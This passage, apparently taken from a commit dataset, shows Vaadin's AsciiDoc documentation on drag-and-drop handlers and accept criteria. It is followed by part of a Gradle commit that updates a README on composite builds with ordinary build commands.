are\nconveniency extensions that allow definiting allowed drop targets as a set of\nitems. They also provide some optimization by lazy loading, which reduces server\ncommunications significantly.\n\n\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n \/\/ Server-side accept criterion that allows drops on any\n \/\/ other tree node except on node that may not have children\n TreeDropCriterion criterion = new TreeDropCriterion() {\n @Override\n protected Set<Object> getAllowedItemIds(\n DragAndDropEvent dragEvent, Tree tree) {\n HashSet<Object> allowed = new HashSet<Object>();\n for (Iterator<Object> i =\n tree.getItemIds().iterator(); i.hasNext();) {\n Object itemId = i.next();\n if (tree.hasChildren(itemId))\n allowed.add(itemId);\n }\n return allowed;\n }\n };\n return criterion;\n}\n----\n\n\n[[advanced.dragndrop.acceptcriteria.indicators]]\n=== Accept Indicators\n\nWhen a dragged object hovers on a drop target, an __accept indicator__ is\ndisplayed to show whether or not the location is accepted. For\n[parameter]#MIDDLE# location, the indicator is a box around the target (tree\nnode, table row, or component). For vertical drop locations, the accepted\nlocations are shown as horizontal lines, and for horizontal drop locations as\nvertical lines.\n\nFor [classname]#DragAndDropWrapper# drop targets, you can disable the accept\nindicators or __drag hints__ with the [parameter]#no-vertical-drag-hints#,\n[parameter]#no-horizontal-drag-hints#, and [parameter]#no-box-drag-hints#\nstyles. You need to add the styles to the __layout that contains__ the wrapper,\nnot to the wrapper itself.\n\n\n[source, java]\n----\n\/\/ Have a wrapper\nDragAndDropWrapper wrapper = new DragAndDropWrapper(c);\nlayout.addComponent(wrapper);\n\n\/\/ Disable the hints\nlayout.addStyleName(\"no-vertical-drag-hints\");\nlayout.addStyleName(\"no-horizontal-drag-hints\");\nlayout.addStyleName(\"no-box-drag-hints\");\n----\n\n\n(((range=\"endofrange\", startref=\"term.advanced.dragndrop.acceptcriteria\")))\n\n[[advanced.dragndrop.dragging]]\n== Dragging Components\n\nDragging a component requires wrapping the source component within a\n[classname]#DragAndDropWrapper#. You can then allow dragging by putting the\nwrapper (and the component) in drag mode with [methodname]#setDragStartMode()#.\nThe method supports two drag modes: [parameter]#DragStartMode.WRAPPER# and\n[parameter]#DragStartMode.COMPONENT#, which defines whether the entire wrapper\nis shown as the drag image while dragging or just the wrapped component.\n\n\n[source, java]\n----\n\/\/ Have a component to drag\nfinal Button button = new Button(\"An Absolute Button\");\n\n\/\/ Put the component in a D&D wrapper and allow dragging it\nfinal DragAndDropWrapper buttonWrap = new DragAndDropWrapper(button);\nbuttonWrap.setDragStartMode(DragStartMode.COMPONENT);\n\n\/\/ Set the wrapper to wrap tightly around the component\nbuttonWrap.setSizeUndefined();\n \n\/\/ Add the wrapper, not the component, to the layout\nlayout.addComponent(buttonWrap, \"left: 50px; top: 50px;\");\n----\n\nThe default height of [classname]#DragAndDropWrapper# is undefined, but the\ndefault width is 100%. If you want to ensure that the wrapper fits tightly\naround the wrapped component, you should call [methodname]#setSizeUndefined()#\nfor the wrapper. Doing so, you should make sure that the wrapped component does\nnot have a relative size, which would cause a paradox.\n\nDragged components are referenced in the [classname]#WrapperTransferable#. You\ncan get the reference to the dragged component with\n[methodname]#getDraggedComponent()#. The method will return [literal]#++null++#\nif the transferable is not a component. Also HTML 5 drags (see later) are held\nin wrapper transferables.\n\n\n[[advanced.dragndrop.drop-on-component]]\n== Dropping on a Component\n\nDrops on a component are enabled by wrapping the component in a\n[classname]#DragAndDropWrapper#. The wrapper is an ordinary component; the\nconstructor takes the wrapped component as a parameter. You just need to define\nthe [classname]#DropHandler# for the wrapper with\n[methodname]#setDropHandler()#.\n\nIn the following example, we allow moving components in an absolute layout.\nDetails on the drop handler are given later.\n\n\n[source, java]\n----\n\/\/ A layout that allows moving its contained components\n\/\/ by dragging and dropping them\nfinal AbsoluteLayout absLayout = new AbsoluteLayout();\nabsLayout.setWidth(\"100%\");\nabsLayout.setHeight(\"400px\");\n\n... put some (wrapped) components in the layout ...\n\n\/\/ Wrap the layout to allow handling drops\nDragAndDropWrapper layoutWrapper =\n new DragAndDropWrapper(absLayout);\n\n\/\/ Handle moving components within the AbsoluteLayout\nlayoutWrapper.setDropHandler(new DropHandler() {\n public AcceptCriterion getAcceptCriterion() {\n return AcceptAll.get();\n }\n \n public void drop(DragAndDropEvent event) {\n ... \n }\n});\n----\n\n[[advanced.dragndrop.drop-on-component.details]]\n=== Target Details for Wrapped Components\n\nThe drop handler receives the drop target details in a\n[classname]#WrapperTargetDetails# object, which implements the\n[classname]#TargetDetails# interface.\n\n\n[source, java]\n----\npublic void drop(DragAndDropEvent event) {\n WrapperTransferable t =\n (WrapperTransferable) event.getTransferable();\n WrapperTargetDetails details =\n (WrapperTargetDetails) event.getTargetDetails();\n----\n\nThe wrapper target details include a [classname]#MouseEventDetails# object,\nwhich you can get with [methodname]#getMouseEvent()#. You can use it to get the\nmouse coordinates for the position where the mouse button was released and the\ndrag ended. Similarly, you can find out the drag start position from the\ntransferable object (if it is a [classname]#WrapperTransferable#) with\n[methodname]#getMouseDownEvent()#.\n\n\n[source, java]\n----\n\/\/ Calculate the drag coordinate difference\nint xChange = details.getMouseEvent().getClientX()\n - t.getMouseDownEvent().getClientX();\nint yChange = details.getMouseEvent().getClientY()\n - t.getMouseDownEvent().getClientY();\n\n\/\/ Move the component in the absolute layout\nComponentPosition pos =\n absLayout.getPosition(t.getSourceComponent());\npos.setLeftValue(pos.getLeftValue() + xChange);\npos.setTopValue(pos.getTopValue() + yChange);\n----\n\nYou can get the absolute x and y coordinates of the target wrapper with\n[methodname]#getAbsoluteLeft()# and [methodname]#getAbsoluteTop()#, which allows\nyou to translate the absolute mouse coordinates to coordinates relative to the\nwrapper. Notice that the coordinates are really the position of the wrapper, not\nthe wrapped component; the wrapper reserves some space for the accept\nindicators.\n\nThe [methodname]#verticalDropLocation()# and\n[methodname]#horizontalDropLocation()# return the more detailed drop location in\nthe target.\n\n\n\n[[advanced.dragndrop.external]]\n== Dragging Files from Outside the Browser\n\nThe [classname]#DragAndDropWrapper# allows dragging files from outside the\nbrowser and dropping them on a component wrapped in the wrapper. Dropped files\nare automatically uploaded to the application and can be acquired from the\nwrapper with [methodname]#getFiles()#. The files are represented as\n[classname]#Html5File# objects as defined in the inner class. You can define an\nupload [classname]#Receiver# to receive the content of a file to an\n[classname]#OutputStream#.\n\nDragging and dropping files to browser is supported in HTML 5 and requires a\ncompatible browser, such as Mozilla Firefox 3.6 or newer.\n\n\n(((range=\"endofrange\", startref=\"term.advanced.dragndrop\")))\n\n\n","old_contents":"---\ntitle: Drag and Drop\norder: 12\nlayout: page\n---\n\n[[advanced.dragndrop]]\n= Drag and Drop\n\n(((\"Drag and Drop\", id=\"term.advanced.dragndrop\", range=\"startofrange\")))\n\n\nDragging an object from one location to another by grabbing it with mouse,\nholding the mouse button pressed, and then releasing the button to \"drop\" it to\nthe other location is a common way to move, copy, or associate objects. For\nexample, most operating systems allow dragging and dropping files between\nfolders or dragging a document on a program to open it. In Vaadin, it is\npossible to drag and drop components and parts of certain components.\n\nDragged objects, or __transferables__, are essentially data objects. You can\ndrag and drop rows in [classname]#Table# and nodes in [classname]#Tree#\ncomponents, either within or between the components. You can also drag entire\ncomponents by wrapping them inside [classname]#DragAndDropWrapper#.\n\nDragging starts from a __drag source__, which defines the transferable.\nTransferables implement the [classname]#Transferable# interfaces. For trees and\ntables, which are bound to [classname]#Container# data sources, a node or row\ntransferable is a reference to an [classname]#Item# in the Vaadin Data Model.\nDragged components are referenced with a [classname]#WrapperTransferable#.\nStarting dragging does not require any client-server communication, you only\nneed to enable dragging. All drag and drop logic occurs in two operations:\ndetermining ( __accepting__) where dropping is allowed and actually dropping.\nDrops can be done on a __drop target__, which implements the\n[classname]#DropTarget# interface. Three components implement the interface:\n[classname]#Tree#, [classname]#Table#, and [classname]#DragAndDropWrapper#.\nThese accept and drop operations need to be provided in a __drop handler__.\nEssentially all you need to do to enable drag and drop is to enable dragging in\nthe drag source and implement the [methodname]#getAcceptCriterion()# and\n[methodname]#drop()# methods in the [classname]#DropHandler# interface.\n\nThe client-server architecture of Vaadin causes special requirements for the\ndrag and drop functionality. The logic for determining where a dragged object\ncan be dropped, that is, __accepting__ a drop, should normally be done on the\nclient-side, in the browser. Server communications are too slow to have much of\nsuch logic on the server-side. The drag and drop feature therefore offers a\nnumber of ways to avoid the server communications to ensure a good user\nexperience.\n\n[[advanced.dragndrop.drophandler]]\n== Handling Drops\n\nMost of the user-defined drag and drop logic occurs in a __drop handler__, which\nis provided by implementing the [methodname]#drop()# method in the\n[classname]#DropHandler# interface. A closely related definition is the drop\naccept criterion, which is defined in the [methodname]#getAcceptCriterion()#\nmethod in the same interface. It is described in\n<<advanced.dragndrop.acceptcriteria>> later.\n\nThe [methodname]#drop()# method gets a [classname]#DragAndDropEvent# as its\nparameters. The event object provides references to two important object:\n[classname]#Transferable# and [classname]#TargetDetails#.\n\nA [classname]#Transferable# contains a reference to the object (component or\ndata item) that is being dragged. A tree or table item is represented as a\n[classname]#TreeTransferable# or [classname]#TableTransferable# object, which\ncarries the item identifier of the dragged tree or table item. These special\ntransferables, which are bound to some data in a container, are\n[classname]#DataBoundTransferable#. Dragged components are represented as\n[classname]#WrapperTransferable# objects, as the components are wrapped in a\n[classname]#DragAndDropWrapper#.\n\nThe [classname]#TargetDetails# object provides information about the exact\nlocation where the transferable object is being dropped. The exact class of the\ndetails object depends on the drop target and you need to cast it to the proper\nsubclass to get more detailed information. If the target is selection component,\nessentially a tree or a table, the [classname]#AbstractSelectTargetDetails#\nobject tells the item on which the drop is being made. For trees, the\n[classname]#TreeTargetDetails# gives some more details. For wrapped components,\nthe information is provided in a [classname]#WrapperDropDetails# object. In\naddition to the target item or component, the details objects provide a __drop\nlocation__. For selection components, the location can be obtained with the\n[methodname]#getDropLocation()# and for wrapped components with\n[methodname]#verticalDropLocation()# and [methodname]#horizontalDropLocation()#.\nThe locations are specified as either [classname]#VerticalDropLocation# or\n[classname]#HorizontalDropLocation# objects. The drop location objects specify\nwhether the transferable is being dropped above, below, or directly on (at the\nmiddle of) a component or item.\n\nDropping on a [classname]#Tree#, [classname]#Table#, and a wrapped component is\nexplained further in the following sections.\n\n\n[[advanced.dragndrop.treedrop]]\n== Dropping Items On a [classname]#Tree#\n\nYou can drag items from, to, or within a [classname]#Tree#. Making tree a drag\nsource requires simply setting the drag mode with [methodname]#setDragMode()#.\n[classname]#Tree# currently supports only one drag mode,\n[literal]#++TreeDragMode.NODE++#, which allows dragging single tree nodes. While\ndragging, the dragged node is referenced with a [classname]#TreeTransferable#\nobject, which is a [classname]#DataBoundTransferable#. The tree node is\nidentified by the item ID of the container item.\n\nWhen a transferable is dropped on a tree, the drop location is stored in a\n[classname]#TreeTargetDetails# object, which identifies the target location by\nitem ID of the tree node on which the drop is made. You can get the item ID with\n[methodname]#getItemIdOver()# method in\n[classname]#AbstractSelectTargetDetails#, which the\n[classname]#TreeTargetDetails# inherits. A drop can occur directly on or above\nor below a node; the exact location is a [classname]#VerticalDropLocation#,\nwhich you can get with the [methodname]#getDropLocation()# method.\n\nIn the example below, we have a [classname]#Tree# and we allow reordering the\ntree items by drag and drop.\n\n\n[source, java]\n----\nfinal Tree tree = new Tree(\"Inventory\");\ntree.setContainerDataSource(TreeExample.createTreeContent());\nlayout.addComponent(tree);\n \n\/\/ Expand all items\nfor (Iterator<?> it = tree.rootItemIds().iterator(); it.hasNext();)\n tree.expandItemsRecursively(it.next());\n \n\/\/ Set the tree in drag source mode\ntree.setDragMode(TreeDragMode.NODE);\n \n\/\/ Allow the tree to receive drag drops and handle them\ntree.setDropHandler(new DropHandler() {\n public AcceptCriterion getAcceptCriterion() {\n return AcceptAll.get();\n }\n\n public void drop(DragAndDropEvent event) {\n \/\/ Wrapper for the object that is dragged\n Transferable t = event.getTransferable();\n \n \/\/ Make sure the drag source is the same tree\n if (t.getSourceComponent() != tree)\n return;\n \n TreeTargetDetails target = (TreeTargetDetails)\n event.getTargetDetails();\n\n \/\/ Get ids of the dragged item and the target item\n Object sourceItemId = t.getData(\"itemId\");\n Object targetItemId = target.getItemIdOver();\n\n \/\/ On which side of the target the item was dropped \n VerticalDropLocation location = target.getDropLocation();\n \n HierarchicalContainer container = (HierarchicalContainer)\n tree.getContainerDataSource();\n\n \/\/ Drop right on an item -> make it a child\n if (location == VerticalDropLocation.MIDDLE)\n tree.setParent(sourceItemId, targetItemId);\n\n \/\/ Drop at the top of a subtree -> make it previous\n else if (location == VerticalDropLocation.TOP) {\n Object parentId = container.getParent(targetItemId);\n container.setParent(sourceItemId, parentId);\n container.moveAfterSibling(sourceItemId, targetItemId);\n container.moveAfterSibling(targetItemId, sourceItemId);\n }\n \n \/\/ Drop below another item -> make it next \n else if (location == VerticalDropLocation.BOTTOM) {\n Object parentId = container.getParent(targetItemId);\n container.setParent(sourceItemId, parentId);\n container.moveAfterSibling(sourceItemId, targetItemId);\n }\n }\n});\n----\n\n[[advanced.dragndrop.treedrop.criteria]]\n=== Accept Criteria for Trees\n\n[classname]#Tree# defines some specialized accept criteria for trees.\n\n[classname]#TargetInSubtree#(client-side):: Accepts if the target item is in the specified sub-tree. The sub-tree is specified by the item ID of the root of the sub-tree in the constructor. The second constructor includes a depth parameter, which specifies how deep from the given root node are drops accepted. Value [literal]#++-1++# means infinite, that is, the entire sub-tree, and is therefore the same as the simpler constructor.\n[classname]#TargetItemAllowsChildren#(client-side):: Accepts a drop if the tree has [methodname]#setChildrenAllowed()# enabled for the target item. The criterion does not require parameters, so the class is a singleton and can be acquired with [methodname]#Tree.TargetItemAllowsChildren.get()#. For example, the following composite criterion accepts drops only on nodes that allow children, but between all nodes: \n+\n[source, java]\n----\nreturn new Or (Tree.TargetItemAllowsChildren.get(), new Not(VerticalLocationIs.MIDDLE));\n----\n\n[classname]#TreeDropCriterion#(server-side):: Accepts drops on only some items, which as specified by a set of item IDs. You must extend the abstract class and implement the [methodname]#getAllowedItemIds()# to return the set. While the criterion is server-side, it is lazy-loading, so that the list of accepted target nodes is loaded only once from the server for each drag operation. See <<advanced.dragndrop.acceptcriteria>> for an example.\n\n\nIn addition, the accept criteria defined in [classname]#AbstractSelect# are\navailable for a [classname]#Tree#, as listed in\n<<advanced.dragndrop.acceptcriteria>>.\n\n\n\n[[advanced.dragndrop.tabledrop]]\n== Dropping Items On a [classname]#Table#\n\nYou can drag items from, to, or within a [classname]#Table#. Making table a drag\nsource requires simply setting the drag mode with [methodname]#setDragMode()#.\n[classname]#Table# supports dragging both single rows, with\n[literal]#++TableDragMode.ROW++#, and multiple rows, with\n[literal]#++TableDragMode.MULTIROW++#. While dragging, the dragged node or nodes\nare referenced with a [classname]#TreeTransferable# object, which is a\n[classname]#DataBoundTransferable#. Tree nodes are identified by the item IDs of\nthe container items.\n\nWhen a transferable is dropped on a table, the drop location is stored in a\n[classname]#AbstractSelectTargetDetails# object, which identifies the target row\nby its item ID. You can get the item ID with [methodname]#getItemIdOver()#\nmethod. A drop can occur directly on or above or below a row; the exact location\nis a [classname]#VerticalDropLocation#, which you can get with the\n[methodname]#getDropLocation()# method from the details object.\n\n[[advanced.dragndrop.tabledrop.criteria]]\n=== Accept Criteria for Tables\n\n[classname]#Table# defines one specialized accept criterion for tables.\n\n[classname]#TableDropCriterion#(server-side):: Accepts drops only on (or above or below) items that are specified by a set of item IDs. You must extend the abstract class and implement the [methodname]#getAllowedItemIds()# to return the set. While the criterion is server-side, it is lazy-loading, so that the list of accepted target items is loaded only once from the server for each drag operation.\n\n\n\n\n[[advanced.dragndrop.acceptcriteria]]\n== Accepting Drops\n\n(((\"Drag and Drop\", \"Accept Criteria\", id=\"term.advanced.dragndrop.acceptcriteria\", range=\"startofrange\")))\n\n\nYou can not drop the objects you are dragging around just anywhere. Before a\ndrop is possible, the specific drop location on which the mouse hovers must be\n__accepted__. Hovering a dragged object over an accepted location displays an\n__accept indicator__, which allows the user to position the drop properly. As\nsuch checks have to be done all the time when the mouse pointer moves around the\ndrop targets, it is not feasible to send the accept requests to the server-side,\nso drops on a target are normally accepted by a client-side __accept\ncriterion__.\n\nA drop handler must define the criterion on the objects which it accepts to be\ndropped on the target. The criterion needs to be provided in the\n[classname]#getAcceptCriterion()# method of the [classname]#DropHandler#\ninterface. A criterion is represented in an [classname]#AcceptCriterion# object,\nwhich can be a composite of multiple criteria that are evaluated using logical\noperations. There are two basic types of criteria: __client-side__ and\n__server-side criteria__. The various built-in criteria allow accepting drops\nbased on the identity of the source and target components, and on the __data\nflavor__ of the dragged objects.\n\nTo allow dropping any transferable objects, you can return a universal accept\ncriterion, which you can get with [methodname]#AcceptAll.get()#.\n\n\n[source, java]\n----\ntree.setDropHandler(new DropHandler() {\n public AcceptCriterion getAcceptCriterion() {\n return AcceptAll.get();\n }\n ...\n----\n\n[[advanced.dragndrop.acceptcriteria.client-side]]\n=== Client-Side Criteria\n\nThe __client-side criteria__, which inherit the\n[classname]#ClientSideCriterion#, are verified on the client-side, so server\nrequests are not needed for verifying whether each component on which the mouse\npointer hovers would accept a certain object.\n\nThe following client-side criteria are define in\n[package]#com.vaadin.event.dd.acceptcriterion#:\n\n[classname]#AcceptAll#:: Accepts all transferables and targets.\n[classname]#And#:: Performs the logical AND operation on two or more client-side criteria; accepts the transferable if all the given sub-criteria accept it.\n[classname]#ContainsDataFlavour#:: The transferable must contain the defined data flavour.\n[classname]#Not#:: Performs the logical NOT operation on a client-side criterion; accepts the transferable if and only if the sub-criterion does not accept it.\n[classname]#Or#:: Performs the logical OR operation on two or more client-side criteria; accepts the transferable if any of the given sub-criteria accepts it.\n[classname]#SourceIs#:: Accepts all transferables from any of the given source components\n[classname]#SourceIsTarget#:: Accepts the transferable only if the source component is the same as the target. This criterion is useful for ensuring that items are dragged only within a tree or a table, and not from outside it.\n[classname]#TargetDetailIs#:: Accepts any transferable if the target detail, such as the item of a tree node or table row, is of the given data flavor and has the given value.\n\n\nIn addition, target components such as [classname]#Tree# and [classname]#Table#\ndefine some component-specific client-side accept criteria. See\n<<advanced.dragndrop.treedrop>> for more details.\n\n[classname]#AbstractSelect# defines the following criteria for all selection\ncomponents, including [classname]#Tree# and [classname]#Table#.\n\n[classname]#AcceptItem#:: Accepts only specific items from a specific selection component. The selection component, which must inherit [classname]#AbstractSelect#, is given as the first parameter for the constructor. It is followed by a list of allowed item identifiers in the drag source.\n[classname]#AcceptItem.ALL#:: Accepts all transferables as long as they are items.\n[classname]#TargetItemIs#:: Accepts all drops on the specified target items. The constructor requires the target component ( [classname]#AbstractSelect#) followed by a list of allowed item identifiers.\n[classname]#VerticalLocationIs.MIDDLE#,[classname]#TOP#, and[classname]#BOTTOM#:: The three static criteria accepts drops on, above, or below an item. For example, you could accept drops only in between items with the following: \n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n return new Not(VerticalLocationIs.MIDDLE);\n}\n----\n\n\n\n\n\n[[advanced.dragndrop.acceptcriteria.server-side]]\n=== Server-Side Criteria\n\nThe __server-side criteria__ are verified on the server-side with the\n[methodname]#accept()# method of the [classname]#ServerSideCriterion# class.\nThis allows fully programmable logic for accepting drops, but the negative side\nis that it causes a very large amount of server requests. A request is made for\nevery target position on which the pointer hovers. This problem is eased in many\ncases by the component-specific lazy loading criteria\n[classname]#TableDropCriterion# and [classname]#TreeDropCriterion#. They do the\nserver visit once for each drag and drop operation and return all accepted rows\nor nodes for current [classname]#Transferable# at once.\n\nThe [methodname]#accept()# method gets the drag event as a parameter so it can\nperform its logic much like in [methodname]#drop()#.\n\n\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n \/\/ Server-side accept criterion that allows drops on any other\n \/\/ location except on nodes that may not have children\n ServerSideCriterion criterion = new ServerSideCriterion() {\n public boolean accept(DragAndDropEvent dragEvent) {\n TreeTargetDetails target = (TreeTargetDetails)\n dragEvent.getTargetDetails();\n\n \/\/ The tree item on which the load hovers\n Object targetItemId = target.getItemIdOver();\n\n \/\/ On which side of the target the item is hovered\n VerticalDropLocation location = target.getDropLocation();\n if (location == VerticalDropLocation.MIDDLE)\n if (! tree.areChildrenAllowed(targetItemId))\n return false; \/\/ Not accepted\n\n return true; \/\/ Accept everything else\n }\n };\n return criterion;\n}\n----\n\nThe server-side criteria base class [classname]#ServerSideCriterion# provides a\ngeneric [methodname]#accept()# method. The more specific\n[classname]#TableDropCriterion# and [classname]#TreeDropCriterion# are\nconveniency extensions that allow definiting allowed drop targets as a set of\nitems. They also provide some optimization by lazy loading, which reduces server\ncommunications significantly.\n\n\n[source, java]\n----\npublic AcceptCriterion getAcceptCriterion() {\n \/\/ Server-side accept criterion that allows drops on any\n \/\/ other tree node except on node that may not have children\n TreeDropCriterion criterion = new TreeDropCriterion() {\n @Override\n protected Set<Object> getAllowedItemIds(\n DragAndDropEvent dragEvent, Tree tree) {\n HashSet<Object> allowed = new HashSet<Object>();\n for (Iterator<Object> i =\n tree.getItemIds().iterator(); i.hasNext();) {\n Object itemId = i.next();\n if (tree.hasChildren(itemId))\n allowed.add(itemId);\n }\n return allowed;\n }\n };\n return criterion;\n}\n----\n\n\n[[advanced.dragndrop.acceptcriteria.indicators]]\n=== Accept Indicators\n\nWhen a dragged object hovers on a drop target, an __accept indicator__ is\ndisplayed to show whether or not the location is accepted. For\n[parameter]#MIDDLE# location, the indicator is a box around the target (tree\nnode, table row, or component). For vertical drop locations, the accepted\nlocations are shown as horizontal lines, and for horizontal drop locations as\nvertical lines.\n\nFor [classname]#DragAndDropWrapper# drop targets, you can disable the accept\nindicators or __drag hints__ with the [parameter]#no-vertical-drag-hints#,\n[parameter]#no-horizontal-drag-hints#, and [parameter]#no-box-drag-hints#\nstyles. You need to add the styles to the __layout that contains__ the wrapper,\nnot to the wrapper itself.\n\n\n[source, java]\n----\n\/\/ Have a wrapper\nDragAndDropWrapper wrapper = new DragAndDropWrapper(c);\nlayout.addComponent(wrapper);\n\n\/\/ Disable the hints\nlayout.addStyleName(\"no-vertical-drag-hints\");\nlayout.addStyleName(\"no-horizontal-drag-hints\");\nlayout.addStyleName(\"no-box-drag-hints\");\n----\n\n\n(((range=\"endofrange\", startref=\"term.advanced.dragndrop.acceptcriteria\")))\n\n[[advanced.dragndrop.dragging]]\n== Dragging Components\n\nDragging a component requires wrapping the source component within a\n[classname]#DragAndDropWrapper#. You can then allow dragging by putting the\nwrapper (and the component) in drag mode with [methodname]#setDragStartMode()#.\nThe method supports two drag modes: [parameter]#DragStartMode.WRAPPER# and\n[parameter]#DragStartMode.COMPONENT#, which defines whether the entire wrapper\nis shown as the drag image while dragging or just the wrapped component.\n\n\n[source, java]\n----\n\/\/ Have a component to drag\nfinal Button button = new Button(\"An Absolute Button\");\n\n\/\/ Put the component in a D&D wrapper and allow dragging it\nfinal DragAndDropWrapper buttonWrap = new DragAndDropWrapper(button);\nbuttonWrap.setDragStartMode(DragStartMode.COMPONENT);\n\n\/\/ Set the wrapper to wrap tightly around the component\nbuttonWrap.setSizeUndefined();\n \n\/\/ Add the wrapper, not the component, to the layout\nlayout.addComponent(buttonWrap, \"left: 50px; top: 50px;\");\n----\n\nThe default height of [classname]#DragAndDropWrapper# is undefined, but the\ndefault width is 100%. If you want to ensure that the wrapper fits tightly\naround the wrapped component, you should call [methodname]#setSizeUndefined()#\nfor the wrapper. Doing so, you should make sure that the wrapped component does\nnot have a relative size, which would cause a paradox.\n\nDragged components are referenced in the [classname]#WrapperTransferable#. You\ncan get the reference to the dragged component with\n[methodname]#getDraggedComponent()#. The method will return [literal]#++null++#\nif the transferable is not a component. Also HTML 5 drags (see later) are held\nin wrapper transferables.\n\n\n[[advanced.dragndrop.drop-on-component]]\n== Dropping on a Component\n\nDrops on a component are enabled by wrapping the component in a\n[classname]#DragAndDropWrapper#. The wrapper is an ordinary component; the\nconstructor takes the wrapped component as a parameter. You just need to define\nthe [classname]#DropHandler# for the wrapper with\n[methodname]#setDropHandler()#.\n\nIn the following example, we allow moving components in an absolute layout.\nDetails on the drop handler are given later.\n\n\n[source, java]\n----\n\/\/ A layout that allows moving its contained components\n\/\/ by dragging and dropping them\nfinal AbsoluteLayout absLayout = new AbsoluteLayout();\nabsLayout.setWidth(\"100%\");\nabsLayout.setHeight(\"400px\");\n\n... put some (wrapped) components in the layout ...\n\n\/\/ Wrap the layout to allow handling drops\nDragAndDropWrapper layoutWrapper =\n new DragAndDropWrapper(absLayout);\n\n\/\/ Handle moving components within the AbsoluteLayout\nlayoutWrapper.setDropHandler(new DropHandler() {\n public AcceptCriterion getAcceptCriterion() {\n return AcceptAll.get();\n }\n \n public void drop(DragAndDropEvent event) {\n ... \n }\n});\n----\n\n[[advanced.dragndrop.drop-on-component.details]]\n=== Target Details for Wrapped Components\n\nThe drop handler receives the drop target details in a\n[classname]#WrapperTargetDetails# object, which implements the\n[classname]#TargetDetails# interface.\n\n\n[source, java]\n----\npublic void drop(DragAndDropEvent event) {\n WrapperTransferable t =\n (WrapperTransferable) event.getTransferable();\n WrapperTargetDetails details =\n (WrapperTargetDetails) event.getTargetDetails();\n----\n\nThe wrapper target details include a [classname]#MouseEventDetails# object,\nwhich you can get with [methodname]#getMouseEvent()#. You can use it to get the\nmouse coordinates for the position where the mouse button was released and the\ndrag ended. Similarly, you can find out the drag start position from the\ntransferable object (if it is a [classname]#WrapperTransferable#) with\n[methodname]#getMouseDownEvent()#.\n\n\n[source, java]\n----\n\/\/ Calculate the drag coordinate difference\nint xChange = details.getMouseEvent().getClientX()\n - t.getMouseDownEvent().getClientX();\nint yChange = details.getMouseEvent().getClientY()\n - t.getMouseDownEvent().getClientY();\n\n\/\/ Move the component in the absolute layout\nComponentPosition pos =\n absLayout.getPosition(t.getSourceComponent());\npos.setLeftValue(pos.getLeftValue() + xChange);\npos.setTopValue(pos.getTopValue() + yChange);\n----\n\nYou can get the absolute x and y coordinates of the target wrapper with\n[methodname]#getAbsoluteLeft()# and [methodname]#getAbsoluteTop()#, which allows\nyou to translate the absolute mouse coordinates to coordinates relative to the\nwrapper. Notice that the coordinates are really the position of the wrapper, not\nthe wrapped component; the wrapper reserves some space for the accept\nindicators.\n\nThe [methodname]#verticalDropLocation()# and\n[methodname]#horizontalDropLocation()# return the more detailed drop location in\nthe target.\n\n\n\n[[advanced.dragndrop.external]]\n== Dragging Files from Outside the Browser\n\nThe [classname]#DragAndDropWrapper# allows dragging files from outside the\nbrowser and dropping them on a component wrapped in the wrapper. Dropped files\nare automatically uploaded to the application and can be acquired from the\nwrapper with [methodname]#getFiles()#. The files are represented as\n[classname]#Html5File# objects as defined in the inner class. You can define an\nupload [classname]#Receiver# to receive the content of a file to an\n[classname]#OutputStream#.\n\nDragging and dropping files to browser is supported in HTML 5 and requires a\ncompatible browser, such as Mozilla Firefox 3.6 or newer.\n\n\n(((range=\"endofrange\", startref=\"term.advanced.dragndrop\")))\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5abfd0d7e527cf49d58c409b518acd3241a67f72","subject":"Update docs re: executing tasks in included builds.","message":"Update docs re: executing tasks in included builds.\n","repos":"gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/samples\/build-organization\/composite-builds\/basic\/README.adoc","new_file":"subprojects\/docs\/src\/samples\/build-organization\/composite-builds\/basic\/README.adoc","new_contents":"NOTE: You can open this sample inside an IDE using the https:\/\/www.jetbrains.com\/help\/idea\/gradle.html#gradle_import_project_start[IntelliJ native importer] or https:\/\/projects.eclipse.org\/projects\/tools.buildship[Eclipse Buildship].\n\n== Defining and using a composite build\n\nThis sample shows how 2 Gradle builds that are normally developed separately and combined using binary integration can be wired together into a composite build with source integration. The `my-utils` multiproject build produces 2 different java libraries, and the `my-app` build produces an executable using functions from those libraries.\n\nNote that the `my-app` build does not have direct dependencies on `my-utils`. Instead, it declares module dependencies on the libraries produced by `my-utils`:\n\n====\ninclude::sample[dir=\"groovy\",files=\"my-app\/app\/build.gradle[tags=app_dependencies]\"]\ninclude::sample[dir=\"kotlin\",files=\"my-app\/app\/build.gradle.kts[tags=app_dependencies]\"]\n====\n\n== Using command-line composite build\n\nWhen using a composite build, no shared repository is required for the builds, and no changes need to be made to the build scripts.\n\n1. Change the sources of `Number.java`\n2. Run the `my-app` application, including the `my-utils` build.\n\n```\ncd my-app\ngradle --include-build ..\/my-utils run\n```\n\nUsing _dependency substitution_, the module dependencies on the util libraries are replaced by project dependencies on `my-utils`.\n\n== Converting `my-app` to a composite build\n\nIt's possible to make the above arrangement persistent, by making `my-app` a composite build that includes `my-utils`.\n\n```\ncd my-app\necho \"includeBuild '..\/my-utils'\" >> settings.gradle\ngradle run\n```\n\nWith this configuration, the module dependencies from `my-app` to `my-utils` will always be substituted with project dependencies.\n\nWhile simple, this approach has the downside of modifying the `my-app` build.\n\n== Using separate composite build\n\nIt is also possible to create a separate composite build that includes both the `my-app` and `my-utils` builds.\n\n====\ninclude::sample[dir=\"groovy\",files=\"settings.gradle[]\"]\ninclude::sample[dir=\"kotlin\",files=\"settings.gradle.kts[]\"]\n====\n\nAfter doing so, you can reference included builds on the directly on the command line in order to execute tasks in them.\n\n```\ngradle :my-app:app:run\n```\n\nIt is also possible to create delegating tasks in the composite project.\n\n====\ninclude::sample[dir=\"groovy\",files=\"build.gradle[tags=run]\"]\ninclude::sample[dir=\"kotlin\",files=\"build.gradle.kts[tags=run]\"]\n====\n\n```\ngradle run\n```\n","old_contents":"NOTE: You can open this sample inside an IDE using the 